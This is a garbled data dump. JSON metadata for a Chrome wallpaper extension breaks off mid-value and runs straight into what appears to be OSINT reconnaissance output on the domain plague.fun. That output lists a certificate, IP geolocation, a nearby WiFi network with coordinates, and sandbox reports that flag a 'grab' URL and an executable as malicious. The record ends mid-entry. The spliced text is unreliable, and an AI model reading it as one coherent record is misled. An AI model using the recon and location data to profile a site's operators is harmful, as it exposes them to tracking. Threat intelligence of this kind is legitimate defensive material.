"0.37", "data": {"extcalls": ["https://home.newtabgallery.com/", "https://newtabgallery.com/welcome/?theme_id=", "https://newtabgallery.com/uninstall/?theme_id"], "webstore": {"website": "", "rating": 4, "privacy_policy": "https://newtabgallery.com/privacy-policy", "last_updated": "2018-12-23", "name": "Plague Inc HD Wallpapers New Tab Theme", "price": "", "offered_by": "", "support_site": "https://www.newtabgallery.com/support", "version": "", "address": "", "short_description": "Includes HD wallpaper images of the game Plague Inc on every new tab.", "permission_warnings": [], "users": 60, "size": "413KiB", "type": "Extension", "email": "info@newtabgallery.com", "rating_users": 1, "icon": "https://lh3.googleusercontent.com/LkIiFecj0j57Vv8kQivIobtgsj7K22WUUE1FdqwQCnmDz2Nuj-45Vqyt44TeCd-CofWCIjcoSrjkv_7GX2-JA8xqVw=w128-h128-e365-rj-sc0x00ffffff"}, "risk": {"webstore": {"website": 1, "last_updated": 5, "users": 1, "address": 1, "total": 9, "rating_users": 1}, "metadata": {}, "total": 411, "csp": {"script-src": 1, "total": 377, "object-src": 1}, "permissions": {"total": 25}}, "related": {"gapecdeolbiphmnkcigpgmncnhjnkhom": {"rating": 3, "users": 466, "platform": "", "short_description": "CS GO wallpapers extension offers great images with every new tab and was made for all fans of CS GO.", "icon": "https://lh3.googleusercontent.com/Q6A61RgzCT3Fsha5p3p_mYUuD_ulqAPXk7PqjmQ0kKyA7-gCxlIDyggIfaIGhhAvmO0UFfQk0cZbcTBVSG7iQtCh=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1, "name": "CS GO HD Wallpapers New Tab"}, "fpmmkkfgclmhcolgmcpjdkfpehgbedim": {"rating": 5, "users": 1000, "platform": "", "short_description": "Replace your new tab with the PUBG Features Custom page, with bookmarks, apps, games and PUBG Game pride wallpaper.", "icon": "https://lh3.googleusercontent.com/8FgkvHkd8sXLvGpg-QpO56iMck1xP9Bv3bV6OwkflKNyr6P2t8wDU1tCFg_N3rlo4f8T730LemwO9w1rH_uQ_t5o=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 5, "name": "PUBG Features Wallpapers HD New Tab"}, "hhpdpohbancinfchpkgliloaocffpceb": {"rating": 3.3666666, "users": 776, "platform": "", "short_description": "Are you ready to be a gunner? Knock balls is a shooting game. Hard levels await you.", "icon": "https://lh3.googleusercontent.com/roRilPyAjm7U77eNqM3m2geyI7mMVOEsYkMdZpqIOQS6cO3GhqVYfi9fHPLCNM2lNCjWZB-HmOQpvaDvJGH7MzyDE_A=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 30, "name": "Knock Balls Game New Tab"}, "dodmbeoncpkfkefgbfiahafdgiccfhmb": {"rating": 4.9995656, "users": 5050, "platform": "", "short_description": "Check Out Our Fortnite Lama Live Wallpapers And Mini Games Date And Time Widgets...", "icon": "https://lh3.googleusercontent.com/76unrUKGATgdPR0Zl3po_OK3mWOQ82IhyHePJdSoxHIIw4pgCnqruTlz8g85NzGl5oqaV0fU0Kk=w128-h128-e365", "rating_users": 2301, "name": "Fortnite Lama Live New Tab Backgrounds"}, "pmnbmfmpehpncbfjfpnfailicicocaap": {"rating": 3.3043478, "users": 1482, "platform": "", "short_description": "Do you like American football game? Believe in yourself, see the goalkeeper and the wall that you really need to pass.", "icon": "https://lh3.googleusercontent.com/jluPSHf4IjMjgqd0rNVMuTfq1f4786G1iiu5koA7B4jo2el8s3MKIzpNpo-cmXd9ET9SnGZW=w128-h128-e365", "rating_users": 23, "name": "Kick Return Football"}, "ghabmoobnekiapiffifjdhgccbfbdgek": {"rating": 3.48, "users": 2000, "platform": "", "short_description": "The game features a map. We jumping into this map with a character we choose. We use a plane and parachute to jump.", "icon": "https://lh3.googleusercontent.com/1Bu9adHav1bGbuWBhJeu4kfPJBdLBVCAzWxwtM-v_ci7_s-pHSz8n183U1l43fcwW-LDJq0uWO3slInJjRWFMY5ToA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 25, "name": "PUBG Craft Battlegrounds Game New Tab"}, "klaadibaiofhdchfigelkbnoilocpapa": {"rating": 1.7822802, "users": 100000, "platform": "", "short_description": "New tab themes with Clash Royale HD wallpapers made by fans for fans of Clash Royale.", "icon": "https://lh3.googleusercontent.com/Zz6C2fCYPAHQ9G9Z9rnDfohq1lnrZPvzCCT0vZkxEOnEOb-35_EZkNvdjWX8ALQpAqLlTdEul2A=w128-h128-e365", "rating_users": 2912, "name": "Clash Royale Wallpaper HD New Tab Themes"}, "fedenmemklhminihgehhicdmabenpkhd": {"rating": 3.6133332, "users": 1000, "platform": "", "short_description": "Fortnite wallpapers extension offers great images with every new tab and was made for all fans of Fortnite wallpaper.", "icon": "https://lh3.googleusercontent.com/DDwo5cVMwI5AIhAp_pmp6dCl7JL38sHImtQCS2gjwmiO2iGtwrmdQfst1YlkUq2wQE-N4ixZzwTyr2lpHWEXdp_tfA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 75, "name": "Fortnite Game Full HD Wallpaper New Tab"}, "dephgmdllolfchlbencncbldjdnkdbok": {"rating": 3.1818182, "users": 735, "platform": "", "short_description": "Minecraft Classic wallpaper extension offers great images with every new tab and was made for all fans of Minecraft.", "icon": "https://lh3.googleusercontent.com/dM50b9FV4NBcF-X2FZPwy0kUtjr5uAf_1wvRVnVhPHiT0OzLRE6h7NCKBYDrgwrVikJc1qWIZBw91eUo-lAYKJ7F=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 11, "name": "Minecraft Classic HD Wallpapers New Tab"}, "hbioademamgcidpknbkilibejpjhhoak": {"rating": 3.8666666, "users": 0, "platform": "", "short_description": "Among Us Skin wallpapers extension offers great images with every new tab and was made for all fans of Among Us.", "icon": "https://lh3.googleusercontent.com/li2kmYtixEszT4j4Le_YmQs49UUBS8X3gG00bFEbdNf16BEBDOxwf6doLGLTN3dBepgsAwyg0at3Wn2rhnoazmLp=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 45, "name": "Among Us Skin HD Wallpaper New Tab"}, "omihfdplpkjcgdkdhoeaclgappcanifp": {"rating": 3.3085105, "users": 0, "platform": "", "short_description": "Among us wallpaper extension offers great images with every new tab and was made for all fans of among us.", "icon": "https://lh3.googleusercontent.com/YaKEbQcoP38TLla09rRswmU6hU8dR1-9nHTE7LYzAPwCm5_pK4TEjA6grkmDEODxAr6_1m-2N9EQbjC9suBfKzkEtA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 94, "name": "Among US Game HD Wallpapers New Tab"}, "dnnkelgikdlinelhmlpipkipmnfeplhp": {"rating": 4.0833335, "users": 284, "platform": "", "short_description": "Cat wallpapers extension offers great images with every new tab and was made for all fans of Cat.", "icon": "https://lh3.googleusercontent.com/I_EAJDo-eiJhq-8CLSqi3_SGwaA57lw48w0g_SRK3a7BS3vBZvWH0o6HBCMarfyB9zWaJRlDcgaY5E3P4k3G6Vop=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 24, "name": "Cat HD Wallpaper New Tab"}, "edjlmaphlhecmhhdgfooaiknmiiokhbe": {"rating": 4.882353, "users": 3000, "platform": "", "short_description": "Replace your new tab with the XXXTentacion Custom page, with bookmarks, apps, games and XXXTentacion wallpaper.", "icon": "https://lh3.googleusercontent.com/iTtrSQ19v--i4xFMwmNKmgJukVnAXaMsn0SbXP5zyFUaglnAbU0W6fdl8BkjbZrQ9-6mduJEO_kH7xxQrYGfgkIjrA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 51, "name": "XXXTentacion 4K Wallpapers New Tab"}, "fiaeliimiajnkmkncccmccnlcpcelpee": {"rating": 3.5, "users": 2000, "platform": "", "short_description": "Roblox wallpaper extension offers great images with every new tab and was made for all fans of Roblox wallpapers.", "icon": "https://lh3.googleusercontent.com/ChzPepItXsUfcsLgwHN82g5n1KCZo_ssLSO4u-NZqZLypgQvBs-Zrbv7V8r6q6py9pAlZrnm-FRAKYgQD-BqofVR=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 22, "name": "Roblox Game HD Wallpapers New Tab"}, "oefnjcadfloohhbchkdmgoecoohonhpn": {"rating": 4.7777777, "users": 1000, "platform": "", "short_description": "Install PUBG HD Wallpapers New Tab Theme ang get HD images of PlayerUnknown's Battlegrounds Battle Royale gameplay.", "icon": "https://lh3.googleusercontent.com/U37Bdee8tejEzgCfbkF51-OLn6ENkBDJvHobXQLQG0hDXCyxQVHIZ8LffkazMFHdpZJJqp4XSbooLtSKGmgvmebncQs=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 36, "name": "PUBG HD Wallpapers New Tab Theme"}, "bhnklgpilfifbkahialpmbnhmpoaiomh": {"rating": 3.7777777, "users": 0, "platform": "", "short_description": "The Simpsons wallpapers extension offers great images with every new tab and was made for all fans of Simpsons.", "icon": "https://lh3.googleusercontent.com/oGZpMcoYYMqEocHdrSNjmlNd_fjhOPUZE-3XZw6zRTa4n2rlYn8OWUGT7v2A_lJps7K4KpjQGSAzdBzEaspSAxCYQhA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 27, "name": "The Simpsons 4K Wallpapers New Tab"}, "cadippdoonnecjfembbfokijpncaiefh": {"rating": 3.5089285, "users": 3000, "platform": "", "short_description": "Easter wallpapers extension offers great images with every new tab and was made for all fans of Easter.", "icon": "https://lh3.googleusercontent.com/-pcJqD8Bf8eTrfQ0S58g3FO29D1OqhWZmKRcZzd4FriR60v1xlIZwhU-yKoGx_tOLCEy97QVIukcsX_OxbztNVPNAA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 112, "name": "Easter HD Wallpaper New Tab"}, "khiclbcknnlgfglgablmakmkhpnclolo": {"rating": 3.0769231, "users": 443, "platform": "", "short_description": "PUBG Battle Royale wallpapers extension offers great images with every new tab and was made for all fans of PUBG.", "icon": "https://lh3.googleusercontent.com/PSigIBqr7dDCtEnN-xQ9DfASfpO-qdYWFcpf0WYRNEyy_tlFCpaguFXk5ahrW_L4yNe6SHQwM2mnMYnGQStollZlcLM=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 13, "name": "PUBG Battle Royale HD Wallpapers New Tab"}}, "manifest": {"update_url": "https://clients2.google.com/service/update2/crx", "description": "Includes HD wallpaper images of the game Plague Inc on every new tab.", "icons": {"128": "icon128.png", "32": "icon32.png", "48": "icon48.png", "16": "icon16.png"}, "chrome_url_overrides": {"newtab": "newtab.html"}, "background": {"scripts": ["background.js"]}, "version": "0.37", "manifest_version": 2, "permissions": ["webNavigation", "tabs", "https://home.newtabgallery.com/*"], "browser_action": {"default_icon": {"32": "icon32.png", "16": "icon16.png"}, "default_title": "Plague Inc HD Wallpapers New Tab Theme"}, "name": "Plague Inc HD Wallpapers New Tab Theme"}}, "extension_id": "lgglnjfaglblnglkdmmdhmjcpplmjdfj"}, {"platform": "Chrome", "version": "1.0.2", "data": {"entrypoints": {"chrome.tabs.query": {"/tmp/lgglnjfaglblnglkdmmdhmjcpplmjdfj_1.0.2/newtab.js": [3]}}, "webstore": {"website": "", "rating": 4, "privacy_policy": "https://newtabgallery.com/privacy-policy", "last_updated": "2021-12-22", "name": "Plague Inc HD Wallpapers New Tab Theme", "price": "", "offered_by": "" plague.fun 2022-12-18 00:06:06 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None hook.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:43:a4:7d:29:1f:15:0e:6b:ac:86:e4:4b:c0:be:69:71:a9 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Oct 6 20:16:48 2022 GMT Not After : Jan 4 20:16:47 2023 GMT Subject: CN=hook.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:f0:6d:9d:3e:65:e2:27:e7:f9:e7:b1:43:5d:9b: 9c:71:a3:74:87:8a:60:c8:7f:29:27:0c:3b:70:18: 0e:65:ff:e2:e4:6c:b2:93:6d:33:61:6a:bf:38:4f: 05:cd:5b:2e:49:18:0c:c5:32:5e:a6:f8:13:92:a2: 54:15:20:f1:b8 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 2D:72:09:99:1A:17:4B:10:83:60:E6:EB:30:F2:51:56:F6:45:4B:C4 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:hook.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 62:2e:6e:14:8d:41:a7:bb:0e:68:24:08:35:d3:3a:ea:e6:12: ce:9a:66:04:e2:c6:aa:5b:e4:4d:cc:31:b7:05:c8:4f:da:d7: d5:d6:10:3e:24:7f:af:0c:2d:0a:54:a4:15:d7:2c:54:07:df: 80:be:82:e8:96:f8:df:13:0f:ca:15:85:8c:8d:ca:d0:c7:67: 5f:86:6d:5d:8e:88:a2:b2:15:b1:05:8e:c8:b9:11:6d:8f:45: eb:c2:e1:17:34:0a:fb:7f:08:95:52:e0:0f:1f:cf:a2:f8:5e: 69:d3:9a:86:38:fe:d7:84:40:b6:45:97:0e:3d:ed:23:c6:a6: ca:7f:d1:93:02:99:0d:64:b3:6a:a4:7b:b4:a9:d7:ad:9a:ea: 42:25:40:f9:3d:9a:2a:90:83:d8:92:96:ac:14:90:ef:93:ff: 94:66:f7:1b:6a:31:a2:4f:de:41:d1:2a:db:6e:69:90:2e:7d: 4a:64:c1:35:93:6d:6c:81:fa:e5:ee:8e:df:8c:78:eb:8c:af: bc:01:e0:1c:88:97:75:c8:83:4a:56:b4:d5:8a:03:a1:10:24: 2e:e6:a1:32:ec:3e:b8:79:f4:13:27:29:6a:93:6c:87:c4:ca: 7a:66:fa:f4:e5:1c:05:80:a9:2f:34:cf:9c:4e:49:fb:58:1a: 72:6a:04:0c 2022-12-18 00:14:32 Country No Country Name Extractor 0 0 3 0 None Italy Bergamo, Lombardy, 25, Italy, IT 2022-12-18 00:36:48 Similar Domain Yes TLD Searcher 0 0 1 0 None plague.ddns.net plague.fun 2022-12-18 00:12:18 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NJ', u'country_tld': u'.us', u'ip': u'2606:4700:3037::6815:13f3', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'Newark', u'network': u'2606:4700:3030::/44', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 40.7641, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'CLOUDFLARENET', u'postal': u'07104', u'asn': u'AS13335', u'country': u'US', u'region': u'New Jersey', u'longitude': -74.1654, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} 2606:4700:3037::6815:13f3 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet2EE2 (Net ID: 00:01:36:5B:2E:E0) 37.7803446,-122.3906132 2022-12-18 00:04:12 Raw Data from RIRs No Hybrid Analysis 0 0 1 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://misogyny.wtf/grab/UsRjS959Rqm4sPG4', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"20.226.83.185:80"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"misogyny.wtf"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ca8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_ca8_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3240"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ca8_ConnHashTable<3240>_HashTable_Mutex"\n "IsoScope_ca8_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "IsoScope_ca8_IESQMMUTEX_0_331"\n "IsoScope_ca8_IE_EarlyTabStart_0x91c_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3240"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "G860FG14.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\G860FG14.txt]- [targetUID: 00000000-00003240]\n Dropped file: "EWM9224B.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EWM9224B.txt]- [targetUID: 00000000-00003240]\n Dropped file: "3LR45Z23.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3LR45Z23.txt]- [targetUID: 00000000-00003240]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "~DF66C2219AA8EED58C.TMP" has type "data"- Location: [%TEMP%\\~DF66C2219AA8EED58C.TMP]- [targetUID: 00000000-00003240]\n "_FA9E4B4C-7574-11ED-9F98-0800274F8D7F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "G860FG14.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\G860FG14.txt]- [targetUID: 00000000-00003240]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "EWM9224B.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EWM9224B.txt]- [targetUID: 00000000-00003240]\n "~DF3C52B6399075EFBC.TMP" has type "data"- Location: [%TEMP%\\~DF3C52B6399075EFBC.TMP]- [targetUID: 00000000-00003240]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "3LR45Z23.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3LR45Z23.txt]- [targetUID: 00000000-00003240]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003240]\n "_9A913025-7572-11ED-9F98-0800274F8D7F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFD4AE018E87DABDD4.TMP" has type "data"- Location: [%TEMP%\\~DFD4AE018E87DABDD4.TMP]- [targetUID: 00000000-00003240]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "RecoveryStore._9A913023-7572-11ED-9F98-0800274F8D7F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"misogyny.wtf" seems to be random'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://misogyny.wtf/grab/UsRjS959Rqm4sPG4"\n Pattern match: "http://misogyny.wtf"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'10/91 Antivirus vendors marked sample as malicious (10% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': u'638f5a030d35cf1e924e752e', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'20.226.83.185'], u'sha256': u'33c924af831ebf0a78a69b3c46d21ee130387cbefb922390d78c5dcf642b6f61', u'sha512': u'93acf54f3244d24de431cea4c1df9c9e8bebb2019266f177c1197d434b21cc1f4a49196b7c7b592d395b5609c23630025100a7435b58b6e027edf7a8eb372375', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://misogyny.wtf/grab/UsRjS959Rqm4sPG4', u'submission_id': u'638f5a040d35cf1e924e752f', u'created_at': u'2022-12-06T15:04:36+00:00', u'filename': None}], u'analysis_start_time': u'2022-12-06T15:04:36+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 5, u'machine_learning_models': [], u'total_signatures': 10, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'70c5a18bdec227528eed1b20f93b6aa1', u'network_mode': u'default', u'processes': [], u'sha1': u'7761d83a3b60cb69d52f94b37206195f0f04469d', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Malicious site', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [u'misogyny.wtf'], u'extracted_files': [], u'type_short': []}] misogyny.wtf 2022-12-18 00:05:47 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': u'Windows Gui', u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 1, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': 4, u'submit_name': u'Sims2RPCSettings.exe', u'signatures': [{u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-99', u'name': u'Contains ability to download files from the internet', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'Observed function downloadfile in 5822e87fe484f98cd455b13b7db364f91838e8dd0c87a83bd991f490e5483d51.bin'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"lazyduchess.github.io"\n "ocsp.sectigo.com"\n "ts2.strangetown.repl.co"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\RasPbFile"\n "Local\\ZonesCacheCounterMutex"\n "RasPbFile"\n "Local\\ZonesLockedCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-20', u'name': u'Reads Windows Trust Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 5, u'threat_level': 0, u'type': 3, u'description': u'"Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUST PROVIDERS\\SOFTWARE PUBLISHING"; Key: "STATE")'}, {u'category': u'General', u'origin': u'Loaded Module', u'identifier': u'module-3', u'name': u'Loads the .NET runtime environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 10, u'description': u'"Sims2RPCSettings.exe" loaded module "%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" at 665C0000'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-17', u'name': u'Accesses System Certificates Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1112', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-203', u'attck_id': u'T1112', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE"; Key: "DISALLOWEDCERTSYNCDELTATIME")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\109F1CAED645BB78B3EA2B94C0697C740733031C"; Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\\A377D1B1C0538833035211F4083D00FECC414DAB"; Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\1916A2AF346D399F50313C393200F14140456616"; Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\2A83E9020591A55FC6DDAD3FB102794C52B24E70"; Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: 